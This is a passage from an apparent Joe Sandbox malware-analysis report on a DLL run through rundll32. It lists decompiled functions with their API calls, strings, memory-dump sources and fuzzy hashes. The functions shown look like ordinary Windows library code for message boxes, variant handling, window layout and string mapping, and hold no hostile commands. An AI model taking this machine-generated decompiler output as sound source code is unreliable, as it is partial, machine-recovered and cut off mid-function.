					if( *0x1003a628() == 0 || (_v12 & 0x00000001) == 0) {
						goto L10;
					} else {
						goto L14;
					}
				}
				_t31 = LoadLibraryA("user32.dll");
				if(_t31 == 0) {
					L12:
					return 0;
				}
				_t23 = GetProcAddress(_t31, "MessageBoxA");
				 *0x1003a618 = _t23;
				if(_t23 == 0) {
					goto L12;
				} else {
					 *0x1003a61c = GetProcAddress(_t31, "GetActiveWindow");
					 *0x1003a620 = GetProcAddress(_t31, "GetLastActivePopup");
					if( *0x1003a174 == 2) {
						_t26 = GetProcAddress(_t31, "GetUserObjectInformationA");
						 *0x1003a628 = _t26;
						if(_t26 != 0) {
							 *0x1003a624 = GetProcAddress(_t31, "GetProcessWindowStation");
						}
					}
					goto L6;
				}
			}

APIs

LoadLibraryA.KERNEL32(user32.dll,1002EFE8,?,?), ref: 1001A6CC
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 1001A6E8
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 1001A6F9
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 1001A706
GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 1001A71C
GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 1001A72D

Strings

GetUserObjectInformationA, xrefs: 1001A716
GetActiveWindow, xrefs: 1001A6F3
GetProcessWindowStation, xrefs: 1001A727
user32.dll, xrefs: 1001A6C7
MessageBoxA, xrefs: 1001A6E2
GetLastActivePopup, xrefs: 1001A6FB

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
API String ID: 2238633743-1612076079
Opcode ID: b7c8b26199f9313d3872de1edf43e103a36baaadc2da0241c7ae0f859c6971c5
Instruction ID: ece4e5b35ea2c1b03849cd45da7b458718d01a20518a95c23a8b8522e981f2d9
Opcode Fuzzy Hash: b7c8b26199f9313d3872de1edf43e103a36baaadc2da0241c7ae0f859c6971c5
Instruction Fuzzy Hash: 2E217431A04325AEEB43DFB48CC5B6A3BF8EB07694F550429E900DE192D774DAC19764

Uniqueness

Uniqueness Score: -1.00%

Function 10029F79 Relevance: 19.9, APIs: 13, Instructions: 395
stringCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E10029F79(intOrPtr __ecx) {
				signed int __ebx;
				signed int __edi;
				CHAR* __esi;
				signed int _t161;
				signed int _t164;
				intOrPtr* _t170;
				signed int _t172;
				signed int _t174;
				signed int _t178;
				void* _t192;
				signed short _t203;
				signed int _t204;
				signed int _t205;
				signed int* _t207;
				signed int _t209;
				void* _t213;
				signed int _t214;
				signed int _t217;
				signed short* _t224;
				void* _t233;
				CHAR* _t235;
				signed int _t236;
				intOrPtr* _t237;
				void* _t238;
				void* _t239;
				signed short _t242;
				signed int _t243;
				intOrPtr _t244;
				signed short* _t245;
				signed int** _t246;
				void* _t247;
				void* _t249;
				void* _t250;
				void* _t253;
				void* _t263;

				E10011A8C(E1002AF40, _t247);
				_t250 = _t249 - 0x60;
				 *((intOrPtr*)(_t247 - 0x28)) = __ecx;
				_t161 =  *0x10036148(_t233, _t239, _t213);
				_t214 = 0;
				 *(_t247 - 0x20) = _t161;
				if( *((intOrPtr*)(__ecx)) != 0) {
					E10012400(_t247 - 0x4c, 0, 0x10);
					_t235 =  *(_t247 + 0x18);
					_t253 = _t250 + 0xc;
					if(_t235 == 0) {
						_t164 =  *(_t247 - 0x44);
					} else {
						_t164 = lstrlenA(_t235);
						 *(_t247 - 0x44) = _t164;
					}
					 *((intOrPtr*)(_t247 - 0x1c)) = 0xfffffffd;
					if(( *(_t247 + 0xc) & 0x0000000c) != 0) {
						 *((intOrPtr*)(_t247 - 0x40)) = 1;
						 *((intOrPtr*)(_t247 - 0x48)) = _t247 - 0x1c;
					}
					if(_t164 != _t214) {
						_t244 = E1001F51F(_t164 << 4);
						 *((intOrPtr*)(_t247 - 0x4c)) = _t244;
						E10012400(_t244, _t214,  *(_t247 - 0x44) << 4);
						_t253 = _t253 + 0x10;
						_t245 = _t244 + ( *(_t247 - 0x44) << 4) - 0x10;
						 *(_t247 - 0x14) = _t235;
						 *(_t247 - 0x10) = _t245;
						if( *_t235 != 0) {
							_t200 =  *((intOrPtr*)(_t247 + 0x1c));
							_t246 =  &(_t245[4]);
							_t22 = _t200 - 4; // 0xfffffff9
							_t217 = _t22;
							 *(_t247 - 0x18) = _t246;
							 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + 0xfffffff8;
							_t238 = 4;
							do {
								_t203 =  *( *(_t247 - 0x14)) & 0x000000ff;
								_t224 =  *(_t247 - 0x10);
								 *_t224 = _t203;
								if((_t203 & 0x00000040) != 0) {
									 *_t224 = _t203 & 0x0000ffbf | 0x00004000;
								}
								_t204 =  *_t224 & 0x0000ffff;
								_t263 = _t204 - 0x4002;
								if(_t263 > 0) {
									_t205 = _t204 - 0x4003;
									__eflags = _t205 - 0x12;
									if(_t205 <= 0x12) {
										switch( *((intOrPtr*)(_t205 * 4 +  &M1002A43E))) {
											case 0:
												goto L36;
											case 1:
												 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
												_t217 = _t217 + _t238;
												_t207 =  *_t217;
												asm("sbb ecx, ecx");
												 *_t207 =  ~( *_t207) & 0x0000ffff;
												goto L37;
											case 2:
												goto L38;
										}
									}
								} else {
									if(_t263 == 0) {
										L36:
										 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
										_t217 = _t217 + _t238;
										__eflags = _t217;
										_t207 =  *_t217;
										L37:
										 *_t246 = _t207;
									} else {
										_t209 = _t204;
										if(_t209 <= 0x13) {
											switch( *((intOrPtr*)(_t209 * 4 +  &M1002A3EE))) {
												case 0:
													 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
													_t217 = _t217 + _t238;
													_t210 =  *_t217;
													goto L16;
												case 1:
													goto L36;
												case 2:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
													__eax =  *(__ebp + 0x1c);
													__ebx = __ebx + 8;
													 *__esi =  *( *(__ebp + 0x1c));
													goto L38;
												case 3:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
													__eax =  *(__ebp + 0x1c);
													__ebx = __ebx + 8;
													 *__esi =  *( *(__ebp + 0x1c));
													goto L38;
												case 4:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eflags = __ebx;
													__eax =  *__ebx;
													__ecx =  *__eax;
													goto L22;
												case 5:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eax =  *__ebx;
													_push(__eax);
													 *(__ebp - 0x18) = __eax;
													__imp__#2();
													__eflags =  *(__ebp - 0x18);
													 *__esi = __eax;
													if( *(__ebp - 0x18) != 0) {
														__eflags = __eax;
														if(__eax == 0) {
															goto L25;
														}
													}
													goto L38;
												case 6:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													 *__ebx =  ~( *__ebx);
													asm("sbb eax, eax");
													L16:
													 *_t246 = _t210;
													goto L38;
												case 7:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
													__edi =  *(__ebp - 0x10);
													__ebx = __ebx + 4;
													__esi =  *__ebx;
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__esi =  *(__ebp - 0x18);
													_push(4);
													_pop(__edi);
													goto L38;
												case 8:
													L26:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eax =  *__ebx;
													__eflags = __eax;
													 *(__ebp - 0x18) = __eax;
													if(__eax != 0) {
														__eax = lstrlenA( *(__ebp - 0x18));
														__eax = __eax + 1;
														 *(__ebp - 0x24) = __eax;
														__eax = __eax + __eax;
														__eax = __eax + 3;
														__eax = __eax & 0xfffffffc;
														__eflags = __eax;
														__eax = __esp;
														__eax = E10008BC0(__esp,  *(__ebp - 0x18),  *(__ebp - 0x24),  *((intOrPtr*)(__ebp - 0x20)));
													}
													_push(__eax);
													__imp__#2();
													__eflags =  *(__ebp - 0x18);
													 *__esi = __eax;
													if( *(__ebp - 0x18) != 0) {
														__eflags = __eax;
														if(__eax == 0) {
															L25:
															__eax = E1001D1DB(__ecx);
															goto L26;
														}
													}
													__eax =  *(__ebp - 0x10);
													 *( *(__ebp - 0x10)) = 8;
													goto L38;
												case 9:
													goto L38;
												case 0xa:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													 *__esi =  *__ebx;
													goto L38;
												case 0xb:
													__eax =  *(__ebp + 0x1c);
													__eax =  *(__ebp + 0x1c) + 8;
													__ecx =  *__eax;
													 *(__ebp + 0x1c) = __eax;
													__ebx = __ebx + 8;
													L22:
													 *__esi = __ecx;
													__esi[4] = __eax;
													goto L38;
											}
										}
									}
								}
								L38:
								 *(_t247 - 0x10) =  *(_t247 - 0x10) - 0x10;
								_t246 = _t246 - 0x10;
								 *(_t247 - 0x14) =  &(( *(_t247 - 0x14))[1]);
								 *(_t247 - 0x18) = _t246;
							} while ( *( *(_t247 - 0x14)) != 0);
							_t235 =  *(_t247 + 0x18);
							_t214 = 0;
						}
					}
					_t242 = 0;
					E1001064A(_t247 - 0x3c);
					if( *(_t247 + 0x10) != _t214) {
						_t242 = _t247 - 0x3c;
					}
					E10012400(_t247 - 0x6c, _t214, 0x20);
					_t170 =  *((intOrPtr*)( *((intOrPtr*)(_t247 - 0x28))));
					 *(_t247 - 0x2c) =  *(_t247 - 0x2c) | 0xffffffff;
					 *(_t247 + 0x18) =  *((intOrPtr*)( *_t170 + 0x18))(_t170,  *((intOrPtr*)(_t247 + 8)), 0x1002fb68, _t214,  *(_t247 + 0xc), _t247 - 0x4c, _t242, _t247 - 0x6c, _t247 - 0x2c);
					_t172 =  *(_t247 - 0x44);
					if(_t172 != _t214) {
						_t214 = (_t172 << 4) +  *((intOrPtr*)(_t247 - 0x4c)) - 0x10;
						_t242 = _t235;
						if( *_t235 != 0) {
							do {
								_t192 =  *_t242;
								if(_t192 == 8 || _t192 == 0xe) {
									__imp__#9(_t214);
								}
								_t214 = _t214 - 0x10;
								_t242 = _t242 + 1;
								_t273 =  *_t242;
							} while ( *_t242 != 0);
						}
					}
					_push( *((intOrPtr*)(_t247 - 0x4c)));
					_t161 = L1001F54A(_t214, _t235, _t242, _t273);
					_pop(_t221);
					if( *(_t247 + 0x18) >= 0) {
						L63:
						_t242 =  *(_t247 + 0x10);
						__eflags = _t242;
						if(_t242 != 0) {
							__eflags = _t242 - 0xc;
							if(_t242 != 0xc) {
								_t174 = _t247 - 0x3c;
								__imp__#12(_t174, _t174, 0, _t242);
								_t236 = _t174;
								__eflags = _t236;
								if(_t236 < 0) {
									__imp__#9(_t247 - 0x3c);
									_push(_t236);
									goto L67;
								}
							}
							goto L68;
						}
					} else {
						__imp__#9(_t247 - 0x3c);
						if( *(_t247 + 0x18) == 0x80020009) {
							__eflags =  *(_t247 - 0x54);
							if( *(_t247 - 0x54) != 0) {
								 *(_t247 - 0x54)(_t247 - 0x6c);
							}
							_t178 = E1001F51F(0x20);
							_pop(_t221);
							 *(_t247 + 0x14) = _t178;
							__eflags = _t178;
							 *(_t247 - 4) = 0;
							if(_t178 == 0) {
								_t243 = 0;
								__eflags = 0;
							} else {
								_push( *((intOrPtr*)(_t247 - 0x6c)));
								_t221 = _t178;
								_push(0);
								_push(0);
								_t243 = E10029EA7(_t178);
							}
							 *(_t247 - 4) =  *(_t247 - 4) | 0xffffffff;
							__eflags =  *(_t247 - 0x68);
							_t237 = __imp__#6;
							if( *(_t247 - 0x68) != 0) {
								_t113 = _t243 + 0x18; // 0x18
								_t221 = _t113;
								E10008D7F(_t113,  *(_t247 - 0x68));
								 *_t237( *(_t247 - 0x68));
							}
							__eflags =  *(_t247 - 0x64);
							if( *(_t247 - 0x64) != 0) {
								_t117 = _t243 + 0xc; // 0xc
								_t221 = _t117;
								E10008D7F(_t117,  *(_t247 - 0x64));
								 *_t237( *(_t247 - 0x64));
							}
							__eflags =  *(_t247 - 0x60);
							if( *(_t247 - 0x60) != 0) {
								_t121 = _t243 + 0x14; // 0x14
								_t221 = _t121;
								E10008D7F(_t121,  *(_t247 - 0x60));
								 *_t237( *(_t247 - 0x60));
							}
							 *((intOrPtr*)(_t243 + 0x10)) =  *((intOrPtr*)(_t247 - 0x5c));
							 *((intOrPtr*)(_t243 + 0x1c)) =  *((intOrPtr*)(_t247 - 0x50));
							 *(_t247 + 0x14) = _t243;
							_t161 = E100125AC(_t247 + 0x14, 0x100335f0);
							goto L63;
						} else {
							_push( *(_t247 + 0x18));
							L67:
							E10028C2C(_t221);
							L68:
							_t161 = (_t242 & 0x0000ffff) + 0xfffffffe;
							if(_t161 <= 0x13) {
								switch( *((intOrPtr*)(_t161 * 4 +  &M1002A48A))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 1:
										__ecx =  *(__ebp - 0x34);
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 4:
										__ecx =  *(__ebp - 0x34);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x34);
										__ecx =  *(__ebp - 0x30);
										 *(__eax + 4) =  *(__ebp - 0x30);
										goto L79;
									case 5:
										__eax = E1002888F(__eax,  *(__ebp + 0x14),  *(__ebp - 0x34));
										_push( *(__ebp - 0x34));
										__imp__#6();
										goto L79;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x34) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *( *(__ebp + 0x14)) = __eflags != 0;
										goto L79;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x3c;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										goto L79;
									case 8:
										goto L79;
									case 9:
										_t161 =  *(_t247 + 0x14);
										 *_t161 =  *((intOrPtr*)(_t247 - 0x34));
										goto L79;
								}
							}
						}
					}
				}
				L79:
				 *[fs:0x0] =  *((intOrPtr*)(_t247 - 0xc));
				return _t161;
			}

APIs

__EH_prolog.LIBCMT ref: 10029F7E
lstrlenA.KERNEL32(?,?,?), ref: 10029FB8
VariantClear.OLEAUT32(?), ref: 1002A24B
VariantClear.OLEAUT32(?), ref: 1002A272
SysFreeString.OLEAUT32(?), ref: 1002A2D6
SysFreeString.OLEAUT32(?), ref: 1002A2EB
SysFreeString.OLEAUT32(?), ref: 1002A300
VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 1002A338
VariantClear.OLEAUT32(?), ref: 1002A348

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Variant$ClearFreeString$ChangeH_prologTypelstrlen
String ID:
API String ID: 344392101-0
Opcode ID: 9f045b6e43f5a4d57dedb6d61a5921109a806fdd94788b071b8aeac36768e6b8
Instruction ID: a9662718b04f73c614da94a587231cb4e0efe2d963c3f66c1e6f28ec21cf51de
Opcode Fuzzy Hash: 9f045b6e43f5a4d57dedb6d61a5921109a806fdd94788b071b8aeac36768e6b8
Instruction Fuzzy Hash: 80E16C7190061ADFDF10CFA8E88099EBBB5FF06350F644419F951A7250DB74AE96CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1002037B Relevance: 19.7, APIs: 13, Instructions: 174
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E1002037B(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v5;
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				intOrPtr _t55;
				struct HWND__* _t56;
				intOrPtr _t78;
				intOrPtr _t90;
				signed int _t99;
				struct HWND__* _t100;
				struct HWND__* _t102;
				void* _t104;
				long _t110;
				void* _t113;
				struct HWND__* _t115;
				void* _t117;
				intOrPtr _t119;
				intOrPtr _t123;

				_t113 = __edx;
				_t119 = __ecx;
				_v12 = __ecx;
				_v8 = E100229FB(__ecx);
				_t55 = _a4;
				if(_t55 == 0) {
					if((_v5 & 0x00000040) == 0) {
						_t56 = GetWindow( *(__ecx + 0x1c), 4);
					} else {
						_t56 = GetParent( *(__ecx + 0x1c));
					}
					_t115 = _t56;
					if(_t115 != 0) {
						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
						if(_t100 != 0) {
							_t115 = _t100;
						}
					}
				} else {
					_t115 =  *(_t55 + 0x1c);
				}
				GetWindowRect( *(_t119 + 0x1c),  &_v44);
				if((_v5 & 0x00000040) != 0) {
					_t102 = GetParent( *(_t119 + 0x1c));
					GetClientRect(_t102,  &_v28);
					GetClientRect(_t115,  &_v60);
					MapWindowPoints(_t115, _t102,  &_v60, 2);
				} else {
					if(_t115 != 0) {
						_t99 = GetWindowLongA(_t115, 0xfffffff0);
						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
							_t115 = 0;
						}
					}
					_v100 = 0x28;
					if(_t115 != 0) {
						GetWindowRect(_t115,  &_v60);
						E1000818F(E10008124(_t115, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t90 = E10006E47();
						if(_t90 != 0) {
							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
						}
						E1000818F(E10008124(_t90, 1),  &_v100);
						CopyRect( &_v60,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t117 = _v44.right - _v44.left;
				asm("cdq");
				_t104 = _v44.bottom - _v44.top;
				asm("cdq");
				_t114 = _v60.bottom;
				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
				asm("cdq");
				asm("cdq");
				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
				if(_t110 >= _v28.left) {
					_t78 = _v28.right;
					if(_t117 + _t110 > _t78) {
						_t110 = _t78 - _v44.right + _v44.left;
					}
				} else {
					_t110 = _v28.left;
				}
				if(_t123 >= _v28.top) {
					if(_t104 + _t123 > _v28.bottom) {
						_t123 = _v44.top - _v44.bottom + _v28.bottom;
					}
				} else {
					_t123 = _v28.top;
				}
				return E10022C1F(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
			}

APIs

Part of subcall function 100229FB: GetWindowLongA.USER32 ref: 10022A06

GetParent.USER32(?), ref: 100203A6
SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 100203C9
GetWindowRect.USER32 ref: 100203E2
GetWindowLongA.USER32 ref: 100203F5
CopyRect.USER32 ref: 10020442
CopyRect.USER32 ref: 1002044C
GetWindowRect.USER32 ref: 10020455
CopyRect.USER32 ref: 10020471

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID:
API String ID: 808654186-0
Opcode ID: bc2a5c29a247466f5fd0cf6475133174012110fed443119257e5413e9f092649
Instruction ID: 056421046f6a32db6b1cc4d962777815c3d1ad92550405ad8a13814199706d5f
Opcode Fuzzy Hash: bc2a5c29a247466f5fd0cf6475133174012110fed443119257e5413e9f092649
Instruction Fuzzy Hash: 34512072900619AFDB11DBA8DC85EEEBBBEEF44350F554115FA01F3192DB30E9468B50

Uniqueness

Uniqueness Score: -1.00%

Function 10005E20 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 115
windowCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E10005E20(void* __ecx, struct HWND__* _a4) {
				char _v256;
				char _v344;
				char _v512;
				char _v552;
				char _v768;
				char _v844;
				char _v1024;
				char _v1088;
				char _v1280;
				char _v1332;
				char _v1536;
				struct tagRECT _v1552;
				char _v1564;
				int _t34;
				char* _t35;
				void* _t71;
				struct HWND__* _t72;

				_t72 = _a4;
				_t71 = __ecx;
				GetClassNameA(_t72,  &_v1024, 0x100);
				GetWindowTextA(_t72,  &_v1536, 0x100);
				GetWindowRect(_t72,  &_v1552);
				E10011245( &_v512, "%04d", _t72);
				_push(_v1552.top);
				E10011245( &_v768, "%04d, %04d", _v1552.left);
				_push(_v1552.bottom - _v1552.top);
				E10011245( &_v256, "%04dx%04d", _v1552.right - _v1552.left);
				_t34 = IsWindowVisible(_t72);
				_t35 = "Visible";
				if(_t34 == 0) {
					_t35 = "Hidden";
				}
				_push(_t35);
				_push( &_v1280);
				E10011245();
				if(GetWindowTextLengthA(_t72) == 0) {
					_push("<Not Set>");
					_push( &_v1536);
					E10011245();
				}
				_t73 = _t71 + 0x9b0;
				E1001D448(_t71 + 0x9b0, 1, 0, 0, 0, 0, 0, 0);
				E1001D300(_t71 + 0x9b0, 0, 0,  &_v1564);
				E1001D300(_t71 + 0x9b0, 0, 1,  &_v552);
				E1001D300(_t73, 0, 2,  &_v1332);
				E1001D300(_t73, 0, 3,  &_v1088);
				E1001D300(_t73, 0, 4,  &_v844);
				E1001D300(_t73, 0, 5,  &_v344);
				return 1;
			}

APIs

GetClassNameA.USER32(?,?,00000100), ref: 10005E3F
GetWindowTextA.USER32 ref: 10005E50
GetWindowRect.USER32 ref: 10005E5C
IsWindowVisible.USER32(?), ref: 10005EBB
GetWindowTextLengthA.USER32(?), ref: 10005EE1

Strings

%04d, xrefs: 10005E6A
Hidden, xrefs: 10005ECA
%04dx%04d, xrefs: 10005EAC
<Not Set>, xrefs: 10005EEF
Visible, xrefs: 10005EC3, 10005ECF
%04d, %04d, xrefs: 10005E86

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Text$ClassLengthNameRectVisible
String ID: %04d$%04d, %04d$%04dx%04d$<Not Set>$Hidden$Visible
API String ID: 1863070929-3888214909
Opcode ID: 8058c32e30631926eec03c10e0ccb65e8d38ac2abf2ffc5f940e8fd6f4df4f5e
Instruction ID: 0909732d0e773ac3d42f51162f30a16be28a964636113b23e373a0c541e67195
Opcode Fuzzy Hash: 8058c32e30631926eec03c10e0ccb65e8d38ac2abf2ffc5f940e8fd6f4df4f5e
Instruction Fuzzy Hash: DD3192712507546BE228EB60CC86FEF73ADDBC8B00F40481DF7459A181DBB4B68687E6

Uniqueness

Uniqueness Score: -1.00%

Function 1001467C Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 196
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E1001467C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t75;
				int _t76;
				int _t77;
				int _t83;
				char* _t95;
				int _t96;
				int _t97;
				signed int _t98;
				void* _t106;
				signed int _t110;
				char* _t114;
				int _t116;
				void* _t117;
				char* _t118;
				intOrPtr _t122;

				_push(0x24);
				_push(0x1002e9d0);
				E10012CE0(__ebx, __edi, __esi);
				_t122 =  *0x1003a1d8; // 0x0
				if(_t122 == 0) {
					if(LCMapStringW(0, 0x100, 0x1002e9cc, 1, 0, 0) == 0) {
						if(GetLastError() == 0x78) {
							 *0x1003a1d8 = 2;
						}
					} else {
						 *0x1003a1d8 = 1;
					}
				}
				if( *(_t117 + 0x14) <= 0) {
					L11:
					_t75 =  *0x1003a1d8; // 0x0
					if(_t75 != 1) {
						if(_t75 == 2 || _t75 == 0) {
							 *(_t117 - 0x24) = 0;
							 *((intOrPtr*)(_t117 - 0x2c)) = 0;
							 *(_t117 - 0x28) = 0;
							if( *(_t117 + 8) == 0) {
								_t97 =  *0x1003a4c0; // 0x0
								 *(_t117 + 8) = _t97;
							}
							if( *(_t117 + 0x20) == 0) {
								_t96 =  *0x1003a4d0; // 0x0
								 *(_t117 + 0x20) = _t96;
							}
							_t76 = E10019AB4( *(_t117 + 8));
							_pop(_t106);
							if( *(_t117 + 0x20) != _t76 && _t76 != 0xffffffff) {
								 *(_t117 + 0x20) = _t76;
							}
							_t77 = WideCharToMultiByte( *(_t117 + 0x20), 0,  *(_t117 + 0x10),  *(_t117 + 0x14), 0, 0, 0, 0);
							 *(_t117 - 0x20) = _t77;
							if(_t77 != 0) {
								 *(_t117 - 4) = 0;
								E100116D0(_t77 + 0x00000003 & 0xfffffffc, _t106);
								 *(_t117 - 0x18) = _t118;
								 *(_t117 - 0x1c) = _t118;
								 *(_t117 - 4) =  *(_t117 - 4) | 0xffffffff;
								if( *(_t117 - 0x1c) != 0) {
									L28:
									if(WideCharToMultiByte( *(_t117 + 0x20), 0,  *(_t117 + 0x10),  *(_t117 + 0x14),  *(_t117 - 0x1c),  *(_t117 - 0x20), 0, 0) == 0) {
										L44:
										_t114 =  *(_t117 - 0x34);
										L45:
										if( *(_t117 - 0x28) != 0) {
											_push(_t114);
											E1001111B();
										}
										if( *((intOrPtr*)(_t117 - 0x2c)) != 0) {
											_push( *(_t117 - 0x1c));
											E1001111B();
										}
										_t83 =  *(_t117 - 0x24);
										goto L50;
									}
									_t116 = LCMapStringA( *(_t117 + 8),  *(_t117 + 0xc),  *(_t117 - 0x1c),  *(_t117 - 0x20), 0, 0);
									 *(_t117 - 0x30) = _t116;
									if(_t116 == 0) {
										goto L44;
									}
									 *(_t117 - 4) = 1;
									E100116D0(_t87 + 0x00000003 & 0xfffffffc, _t106);
									 *(_t117 - 0x18) = _t118;
									_t114 = _t118;
									 *(_t117 - 0x34) = _t114;
									 *(_t117 - 4) =  *(_t117 - 4) | 0xffffffff;
									if(_t114 != 0) {
										L34:
										if(LCMapStringA( *(_t117 + 8),  *(_t117 + 0xc),  *(_t117 - 0x1c),  *(_t117 - 0x20), _t114, _t116) != 0) {
											if(( *(_t117 + 0xd) & 0x00000004) == 0) {
												if( *(_t117 + 0x1c) != 0) {
													_push( *(_t117 + 0x1c));
													_push( *(_t117 + 0x18));
												} else {
													_push(0);
													_push(0);
												}
												 *(_t117 - 0x24) = MultiByteToWideChar( *(_t117 + 0x20), 1, _t114, _t116, ??, ??);
											} else {
												 *(_t117 - 0x24) = _t116;
												if( *(_t117 + 0x1c) != 0) {
													if( *(_t117 + 0x1c) < _t116) {
														_t116 =  *(_t117 + 0x1c);
													}
													E10019990( *(_t117 + 0x18), _t114, _t116);
												}
											}
										}
										goto L45;
									} else {
										_t114 = E10011233(_t116);
										if(_t114 == 0) {
											goto L45;
										}
										 *(_t117 - 0x28) = 1;
										goto L34;
									}
								} else {
									_t95 = E10011233( *(_t117 - 0x20));
									_pop(_t106);
									 *(_t117 - 0x1c) = _t95;
									if(_t95 == 0) {
										goto L23;
									}
									 *((intOrPtr*)(_t117 - 0x2c)) = 1;
									goto L28;
								}
							} else {
								goto L23;
							}
						} else {
							L23:
							_t83 = 0;
							L50:
							return E10012D1B(_t83);
						}
					}
					_t83 = LCMapStringW( *(_t117 + 8),  *(_t117 + 0xc),  *(_t117 + 0x10),  *(_t117 + 0x14),  *(_t117 + 0x18),  *(_t117 + 0x1c));
					goto L50;
				}
				_t110 =  *(_t117 + 0x14);
